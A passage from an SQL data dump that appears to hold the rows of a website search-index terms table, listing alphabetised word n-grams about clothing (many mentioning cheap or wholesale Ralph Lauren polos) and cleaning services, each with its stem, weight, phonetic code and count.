hoodies',0,1,1.3,'S320',2,'en'),(34631,'s hoodies category','s hoodies category',0,1,1.6,'S32326',1,'en'),(34632,'s hoodies towels','s hoodies towels',0,1,1.5333,'S32342',1,'en'),(34633,'s sandals','s sandals',0,1,1.3,'S5342',2,'en'),(34634,'s sandals business','s sandals business',0,1,1.6,'S53421252',1,'en'),(34635,'s sandals on','s sandals on',0,1,1.4,'S53425',1,'en'),(34636,'s sandals the','s sandals the',0,1,1.4333,'S53423',1,'en'),(34637,'s shorts','s shorts',0,1,1.2667,'S632',1,'en'),(34638,'s shorts a','s shorts a',0,1,1.3333,'S632',1,'en'),(34639,'s sport','s sport',0,1,1.2333,'S163',2,'en'),(34640,'s sport shirt','s sport shirt',0,1,1.4333,'S163263',2,'en'),(34641,'s striped','s striped',0,1,1.3,'S3613',1,'en'),(34642,'s striped shirts','s striped shirts',0,1,1.5333,'S36132632',1,'en'),(34643,'sale bottle','sale bottle',0,1,1.3667,'S4134',1,'en'),(34644,'sale bottle of','sale bottle of',0,1,1.4667,'S41341',1,'en'),(34645,'sale cleansing','sale cleansing',0,1,1.4667,'S4245252',1,'en'),(34646,'sale cleansing shop','sale cleansing shop',0,1,1.6333,'S42452521',1,'en'),(34647,'sandals','sandal',0,0,0.4667,'S5342',3,'en'),(34648,'sandals astoundingly','sandal astoundingly',0,1,1.6667,'S5342353524',1,'en'),(34649,'sandals astoundingly for','sandal astoundingly for',0,1,1.8,'S534235352416',1,'en'),(34650,'sandals business','sandal business',0,1,1.5333,'S53421252',1,'en'),(34651,'sandals business cleaning','sandal business cleaning',0,1,1.8333,'S53421252452',1,'en'),(34652,'sandals for','sandal for',0,1,1.3667,'S534216',2,'en'),(34653,'sandals for men','sandal for men',0,1,1.5,'S5342165',2,'en'),(34654,'sandals on','sandal on',0,1,1.3333,'S53425',1,'en'),(34655,'sandals on the','sandal on the',0,1,1.4667,'S534253',1,'en'),(34656,'sandals online','sandal online',0,1,1.4667,'S5342545',1,'en'),(34657,'sandals online also','sandal online also',0,1,1.6333,'S534254542',1,'en'),(34658,'sandals the','sandal the',0,1,1.3667,'S53423',1,'en'),(34659,'sandals the cleaners','sandal the cleaners',0,1,1.6667,'S5342324562',1,'en'),(34660,'sandals under','sandal under',0,1,1.4333,'S5342536',1,'en'),(34661,'sandals under this','sandal under this',0,1,1.6,'S534253632',1,'en'),(34662,'sandals women','sandal women',0,1,1.4333,'S53425',1,'en'),(34663,'sandals women with','sandal women with',0,1,1.6,'S534253',1,'en'),(34664,'scarves','scarv',0,0,0.4667,'S612',2,'en'),(34665,'scarves cheap','scarv cheap',0,1,1.4333,'S6121',1,'en'),(34666,'scarves cheap come','scarv cheap come',0,1,1.6,'S612125',1,'en'),(34667,'scarves store','scarv store',0,1,1.4333,'S61236',2,'en'),(34668,'scarves store property','scarv store property',0,1,1.7333,'S6123616163',1,'en'),(34669,'scarves your','scarv your',0,1,1.4,'S6126',1,'en'),(34670,'scarves your regular','scarv your regular',0,1,1.6667,'S6126246',1,'en'),(34671,'scientific','scientif',0,0,0.6667,'S5312',1,'en'),(34672,'scientific effect','scientif effect',0,1,1.5667,'S5312123',1,'en'),(34673,'scientific effect of','scientif effect of',0,1,1.6667,'S53121231',1,'en'),(34674,'section','section',0,0,0.4667,'S350',1,'en'),(34675,'section of','section of',0,1,1.3333,'S351',1,'en'),(34676,'section of the','section of the',0,1,1.4667,'S3513',1,'en'),(34677,'serve your','serv your',0,1,1.3333,'S616',1,'en'),(34678,'serve your household','serv your household',0,1,1.6667,'S616243',1,'en'),(34679,'service they','servic they',0,1,1.4,'S6123',1,'en'),(34680,'service they furnish','servic they furnish',0,1,1.6667,'S61231652',1,'en'),(34681,'services that','servic that',0,1,1.4333,'S6123',1,'en'),(34682,'services that would','servic that would',0,1,1.6333,'S612343',1,'en'),(34683,'services these','servic these',0,1,1.4667,'S61232',1,'en'),(34684,'services these are','servic these are',0,1,1.6,'S612326',1,'en'),(34685,'services will','servic will',0,1,1.4333,'S6124',1,'en'),(34686,'services will be','servic will be',0,1,1.5333,'S61241',1,'en'),(34687,'sheets','sheet',0,0,0.4,'S320',1,'en'),(34688,'sheets sometimes','sheet sometimes',0,1,1.5333,'S325352',1,'en'),(34689,'sheets sometimes work','sheet sometimes work',0,1,1.7,'S32535262',1,'en'),(34690,'shirt','shirt',0,0,0.3333,'S630',4,'en'),(34691,'shirt cleaners','shirt cleaners',0,1,1.4667,'S6324562',1,'en'),(34692,'shirt cleaners to','shirt cleaners to',0,1,1.5667,'S63245623',1,'en'),(34693,'shirt come','shirt come',0,1,1.3333,'S6325',1,'en'),(34694,'shirt come and','shirt come and',0,1,1.4667,'S63253',1,'en'),(34695,'shirt expert','shirt expert',0,1,1.4,'S632163',1,'en'),(34696,'shirt expert to','shirt expert to',0,1,1.5,'S632163',1,'en'),(34697,'shirt for','shirt for',0,1,1.3,'S6316',2,'en'),(34698,'shirt for men','shirt for men',0,1,1.4333,'S63165',2,'en'),(34699,'shirt include','shirt include',0,1,1.4333,'S635243',1,'en'),(34700,'shirt include large','shirt include large',0,1,1.6333,'S635243462',1,'en'),(34701,'shirt mens','shirt mens',0,1,1.3333,'S6352',1,'en'),(34702,'shirt mens air','shirt mens air',0,1,1.4667,'S63526',1,'en'),(34703,'shirt women','shirt women',0,1,1.3667,'S635',2,'en'),(34704,'shirt women definitely','shirt women definitely',0,1,1.7333,'S63531534',1,'en'),(34705,'shirts','shirt',0,0,0.4,'S632',2,'en'),(34706,'shirts and','shirt and',0,1,1.3333,'S63253',1,'en'),(34707,'shirts and more','shirt and more',0,1,1.5,'S6325356',1,'en'),(34708,'shirts bath','shirt bath',0,1,1.3667,'S63213',1,'en'),(34709,'shirts bath ralph','shirt bath ralph',0,1,1.5667,'S63213641',1,'en'),(34710,'shirts for','shirt for',0,1,1.3333,'S63216',2,'en'),(34711,'shirts for girls','shirt for girls',0,1,1.5333,'S632162642',1,'en'),(34712,'shirts for kids','shirt for kids',0,1,1.5,'S63216232',1,'en'),(34713,'shirts for men','shirt for men',0,1,1.4667,'S632165',1,'en'),(34714,'shirts for women','shirt for women',0,1,1.5333,'S632165',2,'en'),(34715,'shirts let','shirt let',0,1,1.3333,'S63243',1,'en'),(34716,'shirts let us','shirt let us',0,1,1.4333,'S632432',1,'en'),(34717,'shirts men','shirt men',0,1,1.3333,'S6325',1,'en'),(34718,'shirts men then','shirt men then',0,1,1.5,'S632535',1,'en'),(34719,'shirts online','shirt online',0,1,1.4333,'S632545',1,'en'),(34720,'shirts online place','shirt online place',0,1,1.6333,'S632545142',1,'en'),(34721,'shirts outlet','shirt outlet',0,1,1.4333,'S632343',2,'en'),(34722,'shirts outlet for','shirt outlet for',0,1,1.5667,'S63234316',1,'en'),(34723,'shirts regards','shirt regards',0,1,1.4667,'S63262632',1,'en'),(34724,'shirts regards to','shirt regards to',0,1,1.5667,'S632626323',1,'en'),(34725,'shirts small','shirt small',0,1,1.4,'S63254',1,'en'),(34726,'shirts small bucket','shirt small bucket',0,1,1.6333,'S63254123',1,'en'),(34727,'shirts wholesale','shirt wholesale',0,1,1.5333,'S632424',1,'en'),(34728,'shirts wholesale your','shirt wholesale your',0,1,1.7,'S6324246',1,'en'),(34729,'shoes for','shoe for',0,1,1.3,'S160',2,'en'),(34730,'shoes for men','shoe for men',0,1,1.4333,'S165',2,'en'),(34731,'shop','shop',0,0,0.2667,'S100',4,'en'),(34732,'shop and','shop and',0,1,1.2667,'S153',1,'en'),(34733,'shop and office','shop and office',0,1,1.5,'S15312',1,'en'),(34734,'shorts','short',0,0,0.4,'S632',2,'en'),(34735,'shorts a','short a',0,1,1.2667,'S632',1,'en'),(34736,'shorts a heavy','short a heavy',0,1,1.4667,'S6321',1,'en'),(34737,'shorts a normal','short a normal',0,1,1.5,'S6325654',1,'en'),(34738,'shorts men','short men',0,1,1.3333,'S6325',2,'en'),(34739,'shorts men look','short men look',0,1,1.5,'S632542',1,'en'),(34740,'simplest','simplest',0,0,0.5333,'S51423',1,'en'),(34741,'simplest to','simplest to',0,1,1.3667,'S51423',1,'en'),(34742,'simplest to handle','simplest to handle',0,1,1.6,'S51423534',1,'en'),(34743,'sleeve','sleev',0,0,0.4,'S410',2,'en'),(34744,'sleeve for','sleev for',0,1,1.3333,'S416',2,'en'),(34745,'sleeve for men','sleev for men',0,1,1.4667,'S4165',2,'en'),(34746,'sleeve for women','sleev for women',0,1,1.5333,'S4165',1,'en'),(34747,'sleeve polo','sleev polo',0,1,1.3667,'S414',2,'en'),(34748,'sleeve polo are','sleev polo are',0,1,1.5,'S4146',1,'en'),(34749,'sleeve polo for','sleev polo for',0,1,1.5,'S41416',1,'en'),(34750,'sleeve polo logical','sleev polo logical',0,1,1.6333,'S41424',1,'en'),(34751,'sleeve shirts','sleev shirts',0,1,1.4333,'S412632',2,'en'),(34752,'sleeve shirts for','sleev shirts for',0,1,1.5667,'S41263216',2,'en'),(34753,'small bucket','small bucket',0,1,1.4,'S54123',1,'en'),(34754,'small bucket of','small bucket of',0,1,1.5,'S541231',1,'en'),(34755,'smaller','smaller',0,0,0.4667,'S546',1,'en'),(34756,'smaller home','smaller home',0,1,1.4,'S5465',1,'en'),(34757,'smaller home windows','smaller home windows',0,1,1.6667,'S546532',1,'en'),(34758,'so for','so for',0,1,1.2,'S160',1,'en'),(34759,'so for all','so for all',0,1,1.3333,'S164',1,'en'),(34760,'so that particles','so that particles',0,1,1.5667,'S3163242',1,'en'),(34761,'so you need','so you need',0,1,1.3667,'S530',1,'en'),(34762,'soak','soak',0,0,0.2667,'S000',1,'en'),(34763,'soak completely','soak completely',0,1,1.5,'S51434',1,'en'),(34764,'soak polo','soak polo',0,1,1.3,'S140',1,'en'),(34765,'soak polo ralph','soak polo ralph',0,1,1.5,'S14641',1,'en'),(34766,'soaked','soak',0,0,0.4,'S300',1,'en'),(34767,'soaked it','soak it',0,1,1.3,'S300',1,'en'),(34768,'soaked it cheap','soak it cheap',0,1,1.5,'S321',1,'en'),(34769,'soap','soap',0,0,0.2667,'S100',1,'en'),(34770,'soap and','soap and',0,1,1.2667,'S153',1,'en'),(34771,'soap and or','soap and or',0,1,1.3667,'S1536',1,'en'),(34772,'solutions for','solut for',0,1,1.4333,'S435216',1,'en'),(34773,'solutions for this','solut for this',0,1,1.6,'S43521632',1,'en'),(34774,'solutions is','solut is',0,1,1.4,'S4352',1,'en'),(34775,'solutions is of','solut is of',0,1,1.5,'S43521',1,'en'),(34776,'some are','some are',0,1,1.2667,'S560',1,'en'),(34777,'some are cheap','some are cheap',0,1,1.4667,'S5621',1,'en'),(34778,'some are ralph','some are ralph',0,1,1.4667,'S5641',1,'en'),(34779,'some serves','some serves',0,1,1.3667,'S52612',1,'en'),(34780,'some serves as','some serves as',0,1,1.4667,'S52612',1,'en'),(34781,'some sort','some sort',0,1,1.3,'S5263',1,'en'),(34782,'some sort of','some sort of',0,1,1.4,'S52631',1,'en'),(34783,'some thing','some thing',0,1,1.3333,'S5352',1,'en'),(34784,'some thing very','some thing very',0,1,1.5,'S535216',1,'en'),(34785,'something ralph','someth ralph',0,1,1.5,'S5352641',1,'en'),(34786,'something ralph lauren','someth ralph lauren',0,1,1.7333,'S5352641465',1,'en'),(34787,'something that','someth that',0,1,1.4667,'S53523',1,'en'),(34788,'something that ralph','someth that ralph',0,1,1.6667,'S53523641',1,'en'),(34789,'sometimes work','sometim work',0,1,1.4667,'S535262',1,'en'),(34790,'sometimes work with','sometim work with',0,1,1.6333,'S5352623',1,'en'),(34791,'sort of','sort of',0,1,1.2333,'S631',3,'en'),(34792,'sort of bottle','sort of bottle',0,1,1.4667,'S63134',1,'en'),(34793,'sort of service','sort of service',0,1,1.5,'S6312612',1,'en'),(34794,'space','space',0,0,0.3333,'S120',2,'en'),(34795,'space in','space in',0,1,1.2667,'S125',1,'en'),(34796,'space in nature','space in nature',0,1,1.5,'S12536',1,'en'),(34797,'sparkling','sparkl',0,0,0.6,'S162452',1,'en'),(34798,'sparkling your','sparkl your',0,1,1.4667,'S1624526',1,'en'),(34799,'sparkling your household','sparkl your household',0,1,1.8,'S1624526243',1,'en'),(34800,'sponge','spong',0,0,0.4,'S152',1,'en'),(34801,'sponge or','spong or',0,1,1.3,'S1526',1,'en'),(34802,'sponge or cloth','spong or cloth',0,1,1.5,'S1526243',1,'en'),(34803,'sport shirt','sport shirt',0,1,1.3667,'S163263',2,'en'),(34804,'sport shirt cleaners','sport shirt cleaners',0,1,1.6667,'S16326324562',1,'en'),(34805,'sport shirt come','sport shirt come',0,1,1.5333,'S16326325',1,'en'),(34806,'sport shirt expert','sport shirt expert',0,1,1.6,'S1632632163',1,'en'),(34807,'sport shirt for','sport shirt for',0,1,1.5,'S16326316',2,'en'),(34808,'sport shirt include','sport shirt include',0,1,1.6333,'S1632635243',1,'en'),(34809,'sport shirt mens','sport shirt mens',0,1,1.5333,'S16326352',1,'en'),(34810,'sport shirt women','sport shirt women',0,1,1.5667,'S1632635',2,'en'),(34811,'spray','sprai',0,0,0.3333,'S160',1,'en'),(34812,'spray or','sprai or',0,1,1.2667,'S160',1,'en'),(34813,'spray or sponge','sprai or sponge',0,1,1.5,'S162152',1,'en'),(34814,'spray wholesale','sprai wholesale',0,1,1.5,'S16424',1,'en'),(34815,'spray wholesale polo','sprai wholesale polo',0,1,1.6667,'S1642414',1,'en'),(34816,'stain','stain',0,0,0.3333,'S350',1,'en'),(34817,'stain and','stain and',0,1,1.3,'S353',1,'en'),(34818,'stain and the','stain and the',0,1,1.4333,'S353',1,'en'),(34819,'stain check','stain check',0,1,1.3667,'S352',1,'en'),(34820,'stain check that','stain check that',0,1,1.5333,'S3523',1,'en'),(34821,'stains','stain',0,0,0.4,'S352',1,'en'),(34822,'stains are','stain are',0,1,1.3333,'S3526',1,'en'),(34823,'stains are ralph','stain are ralph',0,1,1.5333,'S352641',1,'en'),(34824,'store property','store property',0,1,1.4667,'S3616163',1,'en'),(34825,'store property ralph','store property ralph',0,1,1.6667,'S3616163641',1,'en'),(34826,'strategy to','strategi to',0,1,1.3667,'S36323',1,'en'),(34827,'strategy to that','strategi to that',0,1,1.5333,'S36323',1,'en'),(34828,'striped','stripe',0,0,0.4667,'S3613',1,'en'),(34829,'striped one','stripe one',0,1,1.3667,'S36135',1,'en'),(34830,'striped one with','stripe one with',0,1,1.5333,'S361353',1,'en'),(34831,'striped shirts','stripe shirts',0,1,1.4667,'S36132632',1,'en'),(34832,'striped shirts and','stripe shirts and',0,1,1.6,'S3613263253',1,'en'),(34833,'striped shirts for','stripe shirts for',0,1,1.6,'S3613263216',1,'en'),(34834,'striped shirts men','stripe shirts men',0,1,1.6,'S361326325',1,'en'),(34835,'substances','substanc',0,0,0.6667,'S12352',1,'en'),(34836,'substances cleaning','substanc cleaning',0,1,1.6333,'S12352452',1,'en'),(34837,'substances cleaning and','substanc cleaning and',0,1,1.7667,'S1235245253',1,'en'),(34838,'success','success',0,0,0.4667,'S000',2,'en'),(34839,'success is','success is',0,1,1.3333,'S000',1,'en'),(34840,'success is mens','success is mens',0,1,1.5,'S520',1,'en'),(34841,'suppliers','supplier',0,0,0.6,'S1462',1,'en'),(34842,'suppliers womens','supplier womens',0,1,1.5333,'S146252',1,'en'),(34843,'suppliers womens ralph','supplier womens ralph',0,1,1.7333,'S146252641',1,'en'),(34844,'sweaters','sweater',0,0,0.5333,'S362',2,'en'),(34845,'sweaters for','sweater for',0,1,1.4,'S36216',2,'en'),(34846,'sweaters for men','sweater for men',0,1,1.5333,'S362165',2,'en'),(34847,'sweaters sort','sweater sort',0,1,1.4333,'S36263',1,'en'),(34848,'sweaters sort of','sweater sort of',0,1,1.5333,'S362631',1,'en'),(34849,'sweaters with','sweater with',0,1,1.4333,'S3623',1,'en'),(34850,'sweaters with regard','sweater with regard',0,1,1.6667,'S36236263',1,'en'),(34851,'sweaters women','sweater women',0,1,1.4667,'S3625',1,'en'),(34852,'sweaters women that','sweater women that',0,1,1.6333,'S36253',1,'en'),(34853,'sweatshirts','sweatshirt',0,0,0.7333,'S32632',2,'en'),(34854,'sweatshirts men','sweatshirt men',0,1,1.5,'S326325',1,'en'),(34855,'sweatshirts men whether','sweatshirt men whether',0,1,1.7667,'S32632536',1,'en'),(34856,'t tops','t tops',0,1,1.2,'T120',1,'en'),(34857,'t tops now','t tops now',0,1,1.3333,'T125',1,'en'),(34858,'take in','take in',0,1,1.2333,'T250',1,'en'),(34859,'take in flip','take in flip',0,1,1.4,'T25141',1,'en'),(34860,'taken off','taken off',0,1,1.3,'T251',1,'en'),(34861,'taken off this','taken off this',0,1,1.4667,'T25132',1,'en'),(34862,'talking','talk',0,0,0.4667,'T4252',1,'en'),(34863,'talking and','talk and',0,1,1.3667,'T425253',1,'en'),(34864,'talking and in','talk and in',0,1,1.4667,'T4252535',1,'en'),(34865,'tasks','task',0,0,0.3333,'T200',1,'en'),(34866,'tasks with','task with',0,1,1.3333,'T230',1,'en'),(34867,'tasks with various','task with various',0,1,1.6,'T23162',1,'en'),(34868,'ten','ten',0,0,0.2,'T500',2,'en'),(34869,'ten minutes','ten minutes',0,1,1.3667,'T532',1,'en'),(34870,'ten minutes ralph','ten minutes ralph',0,1,1.5667,'T532641',1,'en'),(34871,'term','term',0,0,0.2667,'T650',2,'en'),(34872,'term of','term of',0,1,1.2333,'T651',1,'en'),(34873,'term of the','term of the',0,1,1.3667,'T6513',1,'en'),(34874,'tested','test',0,0,0.4,'T230',1,'en'),(34875,'tested together','test together',0,1,1.5,'T23236',1,'en'),(34876,'tested together ralph','test together ralph',0,1,1.7,'T2323641',1,'en'),(34877,'that is clean','that is clean',0,1,1.4333,'T245',1,'en'),(34878,'that it','that it',0,1,1.2333,'T000',2,'en'),(34879,'that it covers','that it covers',0,1,1.4667,'T2162',1,'en'),(34880,'that operate','that operate',0,1,1.4,'T163',1,'en'),(34881,'that operate across','that operate across',0,1,1.6333,'T163262',1,'en'),(34882,'that particles','that particles',0,1,1.4667,'T163242',1,'en'),(34883,'that particles and','that particles and',0,1,1.6,'T16324253',1,'en'),(34884,'that polo','that polo',0,1,1.3,'T140',1,'en'),(34885,'that polo ralph','that polo ralph',0,1,1.5,'T14641',1,'en'),(34886,'that ralph','that ralph',0,1,1.3333,'T641',1,'en'),(34887,'that ralph lauren','that ralph lauren',0,1,1.5667,'T641465',1,'en'),(34888,'that reason','that reason',0,1,1.3667,'T625',1,'en'),(34889,'that reason ought','that reason ought',0,1,1.5667,'T62523',1,'en'),(34890,'that the ralph','that the ralph',0,1,1.4667,'T641',1,'en'),(34891,'that trivial','that trivial',0,1,1.4,'T614',1,'en'),(34892,'that trivial however','that trivial however',0,1,1.6667,'T61416',1,'en'),(34893,'that used','that used',0,1,1.3,'T230',2,'en'),(34894,'that used on','that used on',0,1,1.4,'T235',1,'en'),(34895,'that wholesale','that wholesale',0,1,1.4667,'T424',1,'en'),(34896,'that wholesale polo','that wholesale polo',0,1,1.6333,'T42414',1,'en'),(34897,'that would','that would',0,1,1.3333,'T430',1,'en'),(34898,'that would ralph','that would ralph',0,1,1.5333,'T43641',1,'en'),(34899,'the actual polo','the actual polo',0,1,1.5,'T23414',1,'en'),(34900,'the actual towel','the actual towel',0,1,1.5333,'T23434',1,'en'),(34901,'the carpet','the carpet',0,1,1.3333,'T2613',1,'en'),(34902,'the carpet cleaned','the carpet cleaned',0,1,1.6,'T26132453',1,'en'),(34903,'the cheap','the cheap',0,1,1.3,'T210',1,'en'),(34904,'the cheap ralph','the cheap ralph',0,1,1.5,'T21641',1,'en'),(34905,'the cleaners','the cleaners',0,1,1.4,'T24562',1,'en'),(34906,'the cleaners can','the cleaners can',0,1,1.5333,'T245625',1,'en'),(34907,'the cleaners to','the cleaners to',0,1,1.5,'T245623',1,'en'),(34908,'the contract','the contract',0,1,1.4,'T253623',1,'en'),(34909,'the contract would','the contract would',0,1,1.6,'T25362343',1,'en'),(34910,'the edge','the edge',0,1,1.2667,'T200',1,'en'),(34911,'the edge of','the edge of',0,1,1.3667,'T210',1,'en'),(34912,'the glass','the glass',0,1,1.3,'T242',1,'en'),(34913,'the glass like','the glass like',0,1,1.4667,'T24242',1,'en'),(34914,'the growing','the growing',0,1,1.3667,'T2652',1,'en'),(34915,'the growing businesses','the growing businesses',0,1,1.7333,'T26521252',1,'en'),(34916,'the hoses','the hoses',0,1,1.3,'T200',1,'en'),(34917,'the hoses so','the hoses so',0,1,1.4,'T200',1,'en'),(34918,'the main','the main',0,1,1.2667,'T500',1,'en'),(34919,'the main categories','the main categories',0,1,1.6333,'T523262',1,'en'),(34920,'the needs','the needs',0,1,1.3,'T532',1,'en'),(34921,'the needs ralph','the needs ralph',0,1,1.5,'T532641',1,'en'),(34922,'the over','the over',0,1,1.2667,'T160',1,'en'),(34923,'the over all','the over all',0,1,1.4,'T164',1,'en'),(34924,'the procurement','the procurement',0,1,1.5,'T162653',1,'en'),(34925,'the procurement of','the procurement of',0,1,1.6,'T1626531',1,'en'),(34926,'the ralph','the ralph',0,1,1.3,'T641',1,'en'),(34927,'the ralph lauren','the ralph lauren',0,1,1.5333,'T641465',1,'en'),(34928,'the reason','the reason',0,1,1.3333,'T625',1,'en'),(34929,'the reason mens','the reason mens',0,1,1.5,'T6252',1,'en'),(34930,'the requirement','the requirement',0,1,1.5,'T62653',1,'en'),(34931,'the requirement involving','the requirement involving',0,1,1.8333,'T62653514152',1,'en'),(34932,'the services will','the services will',0,1,1.5667,'T26124',1,'en'),(34933,'the solutions','the solutions',0,1,1.4333,'T24352',1,'en'),(34934,'the solutions for','the solutions for',0,1,1.5667,'T2435216',1,'en'),(34935,'the stain','the stain',0,1,1.3,'T235',1,'en'),(34936,'the stain check','the stain check',0,1,1.5,'T2352',1,'en'),(34937,'the time bound','the time bound',0,1,1.4667,'T5153',1,'en'),(34938,'the time tested','the time tested',0,1,1.5,'T5323',1,'en'),(34939,'the towel','the towel',0,1,1.3,'T400',1,'en'),(34940,'the towel to','the towel to',0,1,1.4,'T430',1,'en'),(34941,'the urine','the urine',0,1,1.3,'T650',1,'en'),(34942,'the urine polo','the urine polo',0,1,1.4667,'T6514',1,'en'),(34943,'the various','the various',0,1,1.3667,'T162',2,'en'),(34944,'the various commercial','the various commercial',0,1,1.7333,'T1625624',1,'en'),(34945,'the wholesale','the wholesale',0,1,1.4333,'T424',1,'en'),(34946,'the wholesale ralph','the wholesale ralph',0,1,1.6333,'T424641',1,'en'),(34947,'their wholesale','their wholesale',0,1,1.5,'T6424',1,'en'),(34948,'their wholesale ralph','their wholesale ralph',0,1,1.7,'T6424641',1,'en'),(34949,'them there','them there',0,1,1.3333,'T536',1,'en'),(34950,'them there from','them there from',0,1,1.5,'T536165',1,'en'),(34951,'theme','theme',0,0,0.3333,'T500',2,'en'),(34952,'theme you','theme you',0,1,1.3,'T500',1,'en'),(34953,'theme you can','theme you can',0,1,1.4333,'T525',1,'en'),(34954,'then preventable','then preventable',0,1,1.5333,'T51615314',1,'en'),(34955,'then preventable polo','then preventable polo',0,1,1.7,'T5161531414',1,'en'),(34956,'then ralph','then ralph',0,1,1.3333,'T5641',1,'en'),(34957,'then ralph lauren','then ralph lauren',0,1,1.5667,'T5641465',1,'en'),(34958,'then the actual','then the actual',0,1,1.5,'T53234',1,'en'),(34959,'there flip','there flip',0,1,1.3333,'T6141',1,'en'),(34960,'there flip polo','there flip polo',0,1,1.5,'T61414',1,'en'),(34961,'there from','there from',0,1,1.3333,'T6165',1,'en'),(34962,'there from suppliers','there from suppliers',0,1,1.6667,'T616521462',1,'en'),(34963,'these are','these are',0,1,1.3,'T260',1,'en'),(34964,'these are expert','these are expert',0,1,1.5333,'T262163',1,'en'),(34965,'these are the','these are the',0,1,1.4333,'T263',1,'en'),(34966,'they connect','thei connect',0,1,1.4,'T2523',1,'en'),(34967,'they connect water','thei connect water',0,1,1.6,'T25236',1,'en'),(34968,'they furnish','thei furnish',0,1,1.4,'T1652',1,'en'),(34969,'they furnish as','thei furnish as',0,1,1.5,'T1652',1,'en'),(34970,'they polo','thei polo',0,1,1.3,'T140',1,'en'),(34971,'they polo ralph','thei polo ralph',0,1,1.5,'T14641',1,'en'),(34972,'they would','thei would',0,1,1.3333,'T430',1,'en'),(34973,'they would typically','thei would typically',0,1,1.6667,'T43124',1,'en'),(34974,'they would womens','thei would womens',0,1,1.5667,'T4352',1,'en'),(34975,'thick','thick',0,0,0.3333,'T200',2,'en'),(34976,'thick boys','thick boys',0,1,1.3333,'T212',1,'en'),(34977,'thick boys ralph','thick boys ralph',0,1,1.5333,'T212641',1,'en'),(34978,'thing very','thing very',0,1,1.3333,'T5216',1,'en'),(34979,'thing very polo','thing very polo',0,1,1.5,'T521614',1,'en'),(34980,'things manufactured','thing manufactured',0,1,1.6333,'T52512363',1,'en'),(34981,'things manufactured mens','thing manufactured mens',0,1,1.8,'T5251236352',1,'en'),(34982,'this comes','thi comes',0,1,1.3333,'T252',1,'en'),(34983,'this comes mens','thi comes mens',0,1,1.5,'T25252',1,'en'),(34984,'this leaves','thi leaves',0,1,1.3667,'T2412',1,'en'),(34985,'this leaves no','thi leaves no',0,1,1.4667,'T24125',1,'en'),(34986,'this theme','thi theme',0,1,1.3333,'T235',1,'en'),(34987,'this theme you','thi theme you',0,1,1.4667,'T235',1,'en'),(34988,'this usual','thi usual',0,1,1.3333,'T240',1,'en'),(34989,'this usual ralph','thi usual ralph',0,1,1.5333,'T24641',1,'en'),(34990,'this we','thi we',0,1,1.2333,'T200',1,'en'),(34991,'this we are','thi we are',0,1,1.3667,'T260',1,'en'),(34992,'thoroughly top','thoroughli top',0,1,1.4667,'T62431',1,'en'),(34993,'thoroughly top quality','thoroughli top quality',0,1,1.7333,'T62431243',1,'en'),(34994,'through an ralph','through an ralph',0,1,1.5333,'T625641',1,'en'),(34995,'throughout the','throughout the',0,1,1.4667,'T623',2,'en'),(34996,'throughout the stain','throughout the stain',0,1,1.6667,'T623235',1,'en'),(34997,'thus','thu',1,0,0.0333,'T200',1,'en'),(34998,'thus they','thu they',0,1,1.3,'T230',1,'en'),(34999,'thus they would','thu they would',0,1,1.5,'T2343',1,'en'),(35000,'time bound','time bound',0,1,1.3333,'T5153',1,'en'),(35001,'time bound fashion','time bound fashion',0,1,1.6,'T5153125',1,'en'),(35002,'time tested','time tested',0,1,1.3667,'T5323',1,'en'),(35003,'time tested together','time tested together',0,1,1.6667,'T5323236',1,'en'),(35004,'to address','to address',0,1,1.3333,'T620',1,'en'),(35005,'to address cheap','to address cheap',0,1,1.5333,'T621',1,'en'),(35006,'to be cleaned','to be cleaned',0,1,1.4333,'T12453',1,'en'),(35007,'to be contractual','to be contractual',0,1,1.5667,'T12536234',1,'en'),(35008,'to get done','to get done',0,1,1.3667,'T235',1,'en'),(35009,'to handle','to handle',0,1,1.3,'T534',2,'en'),(35010,'to handle if','to handle if',0,1,1.4,'T5341',1,'en'),(35011,'to have','to have',0,1,1.2333,'T100',3,'en'),(35012,'to have ralph','to have ralph',0,1,1.4333,'T1641',1,'en'),(35013,'to minute','to minute',0,1,1.3,'T530',1,'en'),(35014,'to minute to','to minute to',0,1,1.4,'T530',1,'en'),(35015,'to polo','to polo',0,1,1.2333,'T140',2,'en'),(35016,'to polo ralph','to polo ralph',0,1,1.4333,'T14641',2,'en'),(35017,'to ralph','to ralph',0,1,1.2667,'T641',1,'en'),(35018,'to ralph lauren','to ralph lauren',0,1,1.5,'T641465',1,'en'),(35019,'to soak','to soak',0,1,1.2333,'T200',1,'en'),(35020,'to soak completely','to soak completely',0,1,1.6,'T251434',1,'en'),(35021,'to soak polo','to soak polo',0,1,1.4,'T214',1,'en'),(35022,'to that used','to that used',0,1,1.4,'T230',1,'en'),(35023,'to the glass','to the glass',0,1,1.4,'T242',1,'en'),(35024,'to the hoses','to the hoses',0,1,1.4,'T200',1,'en'),(35025,'to work ralph','to work ralph',0,1,1.4333,'T62641',1,'en'),(35026,'to you','to you',0,1,1.2,'T000',2,'en'),(35027,'to you may','to you may',0,1,1.3333,'T500',1,'en'),(35028,'to your polo','to your polo',0,1,1.4,'T614',1,'en'),(35029,'together ralph','togeth ralph',0,1,1.4667,'T23641',1,'en'),(35030,'together ralph lauren','togeth ralph lauren',0,1,1.7,'T23641465',1,'en'),(35031,'too much','too much',0,1,1.2667,'T520',1,'en'),(35032,'too much old','too much old',0,1,1.4,'T5243',1,'en'),(35033,'tools','tool',0,0,0.3333,'T420',1,'en'),(35034,'tools and','tool and',0,1,1.3,'T4253',1,'en'),(35035,'tools and procedures','tool and procedures',0,1,1.6667,'T4253162362',1,'en'),(35036,'top quality','top quality',0,1,1.3667,'T1243',1,'en'),(35037,'top quality cleanup','top quality cleanup',0,1,1.6333,'T12432451',1,'en'),(35038,'tops now','top now',0,1,1.2667,'T125',1,'en'),(35039,'tops now that','top now that',0,1,1.4333,'T1253',1,'en'),(35040,'towel','towel',0,0,0.3333,'T400',1,'en'),(35041,'towel and','towel and',0,1,1.3,'T453',1,'en'),(35042,'towel and input','towel and input',0,1,1.5,'T453513',1,'en'),(35043,'towel and spray','towel and spray',0,1,1.5,'T453216',1,'en'),(35044,'towel to','towel to',0,1,1.2667,'T430',1,'en'),(35045,'towel to soak','towel to soak',0,1,1.4333,'T432',1,'en'),(35046,'towels','towel',0,0,0.4,'T420',1,'en'),(35047,'towels cheap','towel cheap',0,1,1.4,'T421',1,'en'),(35048,'towels cheap polo','towel cheap polo',0,1,1.5667,'T4214',1,'en'),(35049,'tricky','tricki',0,0,0.4,'T620',1,'en'),(35050,'tricky to','tricki to',0,1,1.3,'T623',1,'en'),(35051,'tricky to get','tricki to get',0,1,1.4333,'T62323',1,'en'),(35052,'trivial','trivial',0,0,0.4667,'T614',1,'en'),(35053,'trivial 